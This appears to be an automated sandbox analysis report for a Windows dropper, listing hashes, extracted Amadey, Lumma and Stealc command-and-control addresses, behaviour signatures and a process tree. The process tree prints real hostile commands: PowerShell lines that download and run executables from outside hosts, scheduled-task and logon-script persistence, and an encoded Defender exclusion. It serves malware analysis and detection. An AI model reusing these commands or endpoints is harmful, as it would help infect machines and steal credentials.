Resubmissions

16/03/2025, 14:27

250316-rslvgaszdx 10

16/03/2025, 08:13

250316-j4f5cswsfx 10

15/03/2025, 11:26

250315-njwrjawlt6 10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/03/2025, 08:13

General

  • Target

    random.exe

  • Size

    5.6MB

  • MD5

    f0cad0627e4b852e7ce633df29855373

  • SHA1

    3187e3016d889fdcb5f3c38cc19c1dac27163fe4

  • SHA256

    e7b933849e850c1778c1378c7a5d07df318d86f7b3ee6257885b768fa81f685c

  • SHA512

    c121d9a4d2ced148ac422e193096e7596c8270c662065b9f16efe4ec4ccc1552b44ad92511246fdde7fed55fbb53c178a5da28a84533707a907084c25ad9c615

  • SSDEEP

    98304:6zd9u3jgDjebrGE5pd8PY22ImKYMFCqgupRERune9rmqy3kG/TQ8swX+hh/YG6GR:0dMgebrREbJPYIpKcneY13LTQf6+hVYM

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://citydisco.bet/api

https://crosshairc.life/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://4htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://weaponrywo.digital/api

https://zfurrycomp.top/api

https://htardwarehu.icu/api

https://8cjlaspcorne.icu/api

https://adweaponrywo.digital/api

https://loadoutle.life/api

https://caliberc.today/api

https://pistolpra.bet/api

https://weaponwo.life/api

https://armamenti.world/api

https://selfdefens.bet/api

https://targett.top/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file 25 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 36 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 40 IoCs
  • Identifies Wine through registry keys 2 TTPs 18 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 32 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers new Windows logon scripts automatically executed at logon. 1 TTPs 1 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 22 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 10 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 50 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3388
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u0k28.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:376
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1u87m9.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5568
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4208
          • C:\Users\Admin\AppData\Local\Temp\10232130101\7d89e79575.exe
            "C:\Users\Admin\AppData\Local\Temp\10232130101\7d89e79575.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:4800
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c schtasks /create /tn xBohtmaaiUa /tr "mshta C:\Users\Admin\AppData\Local\Temp\oNTIpkW9d.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1408
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn xBohtmaaiUa /tr "mshta C:\Users\Admin\AppData\Local\Temp\oNTIpkW9d.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:5480
            • C:\Windows\SysWOW64\mshta.exe
              mshta C:\Users\Admin\AppData\Local\Temp\oNTIpkW9d.hta
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5856
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3948
                • C:\Users\Admin\AppData\Local\Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE
                  "C:\Users\Admin\AppData\Local\Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3420
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10232140121\am_no.cmd" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3660
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              6⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:1076
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5432
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3404
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:5052
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3192
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:5860
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4468
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "CUQjymagMKX" /tr "mshta \"C:\Temp\8Gq0M3TmV.hta\"" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1688
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\8Gq0M3TmV.hta"
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              PID:5096
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3248
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3372
          • C:\Users\Admin\AppData\Local\Temp\10232340101\FnJ67k2.exe
            "C:\Users\Admin\AppData\Local\Temp\10232340101\FnJ67k2.exe"
            5⤵
            • Executes dropped EXE
            PID:3076
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              6⤵
                PID:2148
            • C:\Users\Admin\AppData\Local\Temp\10232410101\dbe09a8462.exe
              "C:\Users\Admin\AppData\Local\Temp\10232410101\dbe09a8462.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6036
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                6⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:4228
            • C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe
              "C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:3824
              • C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe
                "C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"
                6⤵
                • Executes dropped EXE
                PID:2832
              • C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe
                "C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"
                6⤵
                • Executes dropped EXE
                PID:876
              • C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe
                "C:\Users\Admin\AppData\Local\Temp\10232420101\139b1863a7.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1564
            • C:\Users\Admin\AppData\Local\Temp\10232430101\FnJ67k2.exe
              "C:\Users\Admin\AppData\Local\Temp\10232430101\FnJ67k2.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4780
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3540
            • C:\Users\Admin\AppData\Local\Temp\10232450101\ADFoyxP.exe
              "C:\Users\Admin\AppData\Local\Temp\10232450101\ADFoyxP.exe"
              5⤵
              • Executes dropped EXE
              PID:2888
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • Suspicious use of AdjustPrivilegeToken
                PID:2452
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -c "Set-ItemProperty -Path 'HKCU:\Environment' -Name 'UserinitMprLogonScript' -Value 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe'"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Registers new Windows logon scripts automatically executed at logon.
                • Suspicious use of AdjustPrivilegeToken
                PID:2340
              • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe
                "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2196
                • C:\Windows\Temp\{582A55AA-9094-46D8-A87C-799AEE030E9A}\.cr\rsfff01fff.exe
                  "C:\Windows\Temp\{582A55AA-9094-46D8-A87C-799AEE030E9A}\.cr\rsfff01fff.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe" -burn.filehandle.attached=660 -burn.filehandle.self=668
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:4992
                  • C:\Windows\Temp\{A0F42E5E-798A-4934-9C43-A265C454AA02}\.ba\irestore.exe
                    C:\Windows\Temp\{A0F42E5E-798A-4934-9C43-A265C454AA02}\.ba\irestore.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:588
                    • C:\Users\Admin\AppData\Roaming\DownloadscanRs\irestore.exe
                      C:\Users\Admin\AppData\Roaming\DownloadscanRs\irestore.exe
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: MapViewOfSection
                      PID:1788
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\SysWOW64\cmd.exe
                        10⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: MapViewOfSection
                        PID:1716
                        • C:\Users\Admin\AppData\Local\Temp\monUninstall.exe
                          C:\Users\Admin\AppData\Local\Temp\monUninstall.exe
                          11⤵
                          • Loads dropped DLL
                          PID:2356
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                            12⤵
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:5884
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x140,0x16c,0x7ffe2bfadcf8,0x7ffe2bfadd04,0x7ffe2bfadd10
                              13⤵
                                PID:6408
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1596,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2160 /prefetch:3
                                13⤵
                                  PID:6332
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2124,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2032 /prefetch:2
                                  13⤵
                                    PID:6344
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2556 /prefetch:8
                                    13⤵
                                      PID:6500
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3264 /prefetch:1
                                      13⤵
                                        PID:6468
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:1
                                        13⤵
                                          PID:6460
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4300,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3868 /prefetch:2
                                          13⤵
                                            PID:6616
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4304,i,521609640816292092,2894735011952428553,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:1
                                            13⤵
                                              PID:5748
                            • C:\Users\Admin\AppData\Local\Temp\10232460101\packed.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232460101\packed.exe"
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Enumerates system info in registry
                              PID:2400
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5480
                              • C:\Windows\SYSTEM32\schtasks.exe
                                schtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10232460101\packed.exe" /sc onlogon /rl HIGHEST /f
                                6⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:3972
                              • C:\Program Files\RuntimeApp\0000023991.exe
                                "C:\Program Files\RuntimeApp\0000023991.exe"
                                6⤵
                                • Executes dropped EXE
                                • Modifies system certificate store
                                PID:4908
                            • C:\Users\Admin\AppData\Local\Temp\10232470101\HmngBpR.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232470101\HmngBpR.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:5600
                              • C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                PID:1860
                                • C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                  C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3376
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\SysWOW64\cmd.exe
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: MapViewOfSection
                                    PID:3920
                                    • C:\Windows\SysWOW64\explorer.exe
                                      C:\Windows\SysWOW64\explorer.exe
                                      9⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: AddClipboardFormatListener
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1928
                            • C:\Users\Admin\AppData\Local\Temp\10232480101\zY9sqWs.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232480101\zY9sqWs.exe"
                              5⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              PID:3944
                              • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                                "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                                6⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:4328
                            • C:\Users\Admin\AppData\Local\Temp\10232490101\3c203fabe0.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232490101\3c203fabe0.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5092
                            • C:\Users\Admin\AppData\Local\Temp\10232500101\3f0728ca94.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232500101\3f0728ca94.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5868
                            • C:\Users\Admin\AppData\Local\Temp\10232510101\7bf490c150.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232510101\7bf490c150.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4056
                            • C:\Users\Admin\AppData\Local\Temp\10232520101\c444958f86.exe
                              "C:\Users\Admin\AppData\Local\Temp\10232520101\c444958f86.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Downloads MZ/PE file
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3252
